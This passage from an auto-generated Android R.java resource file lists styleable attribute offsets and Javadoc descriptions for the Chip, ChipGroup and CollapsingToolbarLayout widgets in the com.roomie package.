a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:checkedIconEnabled */ public static final int Chip_checkedIconEnabled = 24; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#checkedIconVisible} attribute's value can be found in the {@link #Chip} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:checkedIconVisible */ public static final int Chip_checkedIconVisible = 23; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipBackgroundColor} attribute's value can be found in the {@link #Chip} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:chipBackgroundColor */ public static final int Chip_chipBackgroundColor = 9; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipCornerRadius} attribute's value can be found in the {@link #Chip} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:chipCornerRadius */ public static final int Chip_chipCornerRadius = 11; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipEndPadding} attribute's value can be found in the {@link #Chip} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:chipEndPadding */ public static final int Chip_chipEndPadding = 33; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipIcon} attribute's value can be found in the {@link #Chip} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:chipIcon */ public static final int Chip_chipIcon = 16; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipIconEnabled} attribute's value can be found in the {@link #Chip} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:chipIconEnabled */ public static final int Chip_chipIconEnabled = 15; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipIconSize} attribute's value can be found in the {@link #Chip} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:chipIconSize */ public static final int Chip_chipIconSize = 18; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipIconTint} attribute's value can be found in the {@link #Chip} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:chipIconTint */ public static final int Chip_chipIconTint = 17; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipIconVisible} attribute's value can be found in the {@link #Chip} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:chipIconVisible */ public static final int Chip_chipIconVisible = 14; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipMinHeight} attribute's value can be found in the {@link #Chip} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:chipMinHeight */ public static final int Chip_chipMinHeight = 10; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipStartPadding} attribute's value can be found in the {@link #Chip} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:chipStartPadding */ public static final int Chip_chipStartPadding = 26; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipStrokeColor} attribute's value can be found in the {@link #Chip} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:chipStrokeColor */ public static final int Chip_chipStrokeColor = 12; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipStrokeWidth} attribute's value can be found in the {@link #Chip} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:chipStrokeWidth */ public static final int Chip_chipStrokeWidth = 13; /** <p> @attr description Close button icon <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:closeIcon */ public static final int Chip_closeIcon = 5; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#closeIconEnabled} attribute's value can be found in the {@link #Chip} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:closeIconEnabled */ public static final int Chip_closeIconEnabled = 20; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#closeIconEndPadding} attribute's value can be found in the {@link #Chip} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:closeIconEndPadding */ public static final int Chip_closeIconEndPadding = 32; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#closeIconSize} attribute's value can be found in the {@link #Chip} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:closeIconSize */ public static final int Chip_closeIconSize = 22; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#closeIconStartPadding} attribute's value can be found in the {@link #Chip} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:closeIconStartPadding */ public static final int Chip_closeIconStartPadding = 31; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#closeIconTint} attribute's value can be found in the {@link #Chip} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:closeIconTint */ public static final int Chip_closeIconTint = 21; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#closeIconVisible} attribute's value can be found in the {@link #Chip} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:closeIconVisible */ public static final int Chip_closeIconVisible = 19; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#hideMotionSpec} attribute's value can be found in the {@link #Chip} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:hideMotionSpec */ public static final int Chip_hideMotionSpec = 6; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#iconEndPadding} attribute's value can be found in the {@link #Chip} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:iconEndPadding */ public static final int Chip_iconEndPadding = 28; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#iconStartPadding} attribute's value can be found in the {@link #Chip} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:iconStartPadding */ public static final int Chip_iconStartPadding = 27; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#rippleColor} attribute's value can be found in the {@link #Chip} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:rippleColor */ public static final int Chip_rippleColor = 7; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#showMotionSpec} attribute's value can be found in the {@link #Chip} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:showMotionSpec */ public static final int Chip_showMotionSpec = 8; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textEndPadding} attribute's value can be found in the {@link #Chip} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:textEndPadding */ public static final int Chip_textEndPadding = 30; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#textStartPadding} attribute's value can be found in the {@link #Chip} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:textStartPadding */ public static final int Chip_textStartPadding = 29; /** Attributes that can be used with a ChipGroup. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #ChipGroup_checkedChip com.roomie:checkedChip}</code></td><td></td></tr> <tr><td><code>{@link #ChipGroup_chipSpacing com.roomie:chipSpacing}</code></td><td></td></tr> <tr><td><code>{@link #ChipGroup_chipSpacingHorizontal com.roomie:chipSpacingHorizontal}</code></td><td></td></tr> <tr><td><code>{@link #ChipGroup_chipSpacingVertical com.roomie:chipSpacingVertical}</code></td><td></td></tr> <tr><td><code>{@link #ChipGroup_singleLine com.roomie:singleLine}</code></td><td></td></tr> <tr><td><code>{@link #ChipGroup_singleSelection com.roomie:singleSelection}</code></td><td></td></tr> </table> @see #ChipGroup_checkedChip @see #ChipGroup_chipSpacing @see #ChipGroup_chipSpacingHorizontal @see #ChipGroup_chipSpacingVertical @see #ChipGroup_singleLine @see #ChipGroup_singleSelection */ public static final int[] ChipGroup = { 0x7f010174, 0x7f010175, 0x7f010176, 0x7f010177, 0x7f010178, 0x7f010179 }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#checkedChip} attribute's value can be found in the {@link #ChipGroup} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:checkedChip */ public static final int ChipGroup_checkedChip = 5; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipSpacing} attribute's value can be found in the {@link #ChipGroup} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:chipSpacing */ public static final int ChipGroup_chipSpacing = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipSpacingHorizontal} attribute's value can be found in the {@link #ChipGroup} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:chipSpacingHorizontal */ public static final int ChipGroup_chipSpacingHorizontal = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#chipSpacingVertical} attribute's value can be found in the {@link #ChipGroup} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:chipSpacingVertical */ public static final int ChipGroup_chipSpacingVertical = 2; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#singleLine} attribute's value can be found in the {@link #ChipGroup} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:singleLine */ public static final int ChipGroup_singleLine = 3; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#singleSelection} attribute's value can be found in the {@link #ChipGroup} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:singleSelection */ public static final int ChipGroup_singleSelection = 4; /** Attributes that can be used with a CollapsingToolbarLayout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #CollapsingToolbarLayout_collapsedTitleGravity com.roomie:collapsedTitleGravity}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_collapsedTitleTextAppearance com.roomie:collapsedTitleTextAppearance}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_contentScrim com.roomie:contentScrim}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_expandedTitleGravity com.roomie:expandedTitleGravity}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_expandedTitleMargin com.roomie:expandedTitleMargin}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_expandedTitleMarginBottom com.roomie:expandedTitleMarginBottom}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_expandedTitleMarginEnd com.roomie:expandedTitleMarginEnd}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_expandedTitleMarginStart com.roomie:expandedTitleMarginStart}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_expandedTitleMarginTop com.roomie:expandedTitleMarginTop}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_expandedTitleTextAppearance com.roomie:expandedTitleTextAppearance}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_scrimAnimationDuration com.roomie:scrimAnimationDuration}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_scrimVisibleHeightTrigger com.roomie:scrimVisibleHeightTrigger}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_statusBarScrim com.roomie:statusBarScrim}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_title com.roomie:title}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_titleEnabled com.roomie:titleEnabled}</code></td><td></td></tr> <tr><td><code>{@link #CollapsingToolbarLayout_toolbarId com.roomie:toolbarId}</code></td><td></td></tr> </table> @see #CollapsingToolbarLayout_collapsedTitleGravity @see #CollapsingToolbarLayout_collapsedTitleTextAppearance @see #CollapsingToolbarLayout_contentScrim @see #CollapsingToolbarLayout_expandedTitleGravity @see #CollapsingToolbarLayout_expandedTitleMargin @see #CollapsingToolbarLayout_expandedTitleMarginBottom @see #CollapsingToolbarLayout_expandedTitleMarginEnd @see #CollapsingToolbarLayout_expandedTitleMarginStart @see #CollapsingToolbarLayout_expandedTitleMarginTop @see #CollapsingToolbarLayout_expandedTitleTextAppearance @see #CollapsingToolbarLayout_scrimAnimationDuration @see #CollapsingToolbarLayout_scrimVisibleHeightTrigger @see #CollapsingToolbarLayout_statusBarScrim @see #CollapsingToolbarLayout_title @see #CollapsingToolbarLayout_titleEnabled @see #CollapsingToolbarLayout_toolbarId */ public static final int[] CollapsingToolbarLayout = { 0x7f01002c, 0x7f01017a, 0x7f01017b, 0x7f01017c, 0x7f01017d, 0x7f01017e, 0x7f01017f, 0x7f010180, 0x7f010181, 0x7f010182, 0x7f010183, 0x7f010184, 0x7f010185, 0x7f010186, 0x7f010187, 0x7f010188 }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#collapsedTitleGravity} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>top</code></td><td>0x30</td><td></td></tr> <tr><td><code>bottom</code></td><td>0x50</td><td></td></tr> <tr><td><code>left</code></td><td>0x03</td><td></td></tr> <tr><td><code>right</code></td><td>0x05</td><td></td></tr> <tr><td><code>center_vertical</code></td><td>0x10</td><td></td></tr> <tr><td><code>fill_vertical</code></td><td>0x70</td><td></td></tr> <tr><td><code>center_horizontal</code></td><td>0x01</td><td></td></tr> <tr><td><code>center</code></td><td>0x11</td><td></td></tr> <tr><td><code>start</code></td><td>0x00800003</td><td></td></tr> <tr><td><code>end</code></td><td>0x00800005</td><td></td></tr> </table> @attr name com.roomie:collapsedTitleGravity */ public static final int CollapsingToolbarLayout_collapsedTitleGravity = 13; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#collapsedTitleTextAppearance} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:collapsedTitleTextAppearance */ public static final int CollapsingToolbarLayout_collapsedTitleTextAppearance = 7; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#contentScrim} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:contentScrim */ public static final int CollapsingToolbarLayout_contentScrim = 8; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#expandedTitleGravity} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>top</code></td><td>0x30</td><td></td></tr> <tr><td><code>bottom</code></td><td>0x50</td><td></td></tr> <tr><td><code>left</code></td><td>0x03</td><td></td></tr> <tr><td><code>right</code></td><td>0x05</td><td></td></tr> <tr><td><code>center_vertical</code></td><td>0x10</td><td></td></tr> <tr><td><code>fill_vertical</code></td><td>0x70</td><td></td></tr> <tr><td><code>center_horizontal</code></td><td>0x01</td><td></td></tr> <tr><td><code>center</code></td><td>0x11</td><td></td></tr> <tr><td><code>start</code></td><td>0x00800003</td><td></td></tr> <tr><td><code>end</code></td><td>0x00800005</td><td></td></tr> </table> @attr name com.roomie:expandedTitleGravity */ public static final int CollapsingToolbarLayout_expandedTitleGravity = 14; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#expandedTitleMargin} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:expandedTitleMargin */ public static final int CollapsingToolbarLayout_expandedTitleMargin = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#expandedTitleMarginBottom} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:expandedTitleMarginBottom */ public static final int CollapsingToolbarLayout_expandedTitleMarginBottom = 5; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#expandedTitleMarginEnd} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:expandedTitleMarginEnd */ public static final int CollapsingToolbarLayout_expandedTitleMarginEnd = 4; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#expandedTitleMarginStart} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:expandedTitleMarginStart */ public static final int CollapsingToolbarLayout_expandedTitleMarginStart = 2; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#expandedTitleMarginTop} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:expandedTitleMarginTop */ public static final int CollapsingToolbarLayout_expandedTitleMarginTop = 3; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#expandedTitleTextAppearance} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:expandedTitleTextAppearance */ public static final int CollapsingToolbarLayout_expandedTitleTextAppearance = 6; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#scrimAnimationDuration} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:scrimAnimationDuration */ public static final int CollapsingToolbarLayout_scrimAnimationDuration = 12; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#scrimVisibleHeightTrigger} attribute's value can be found in the {@link #CollapsingToolbarLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this 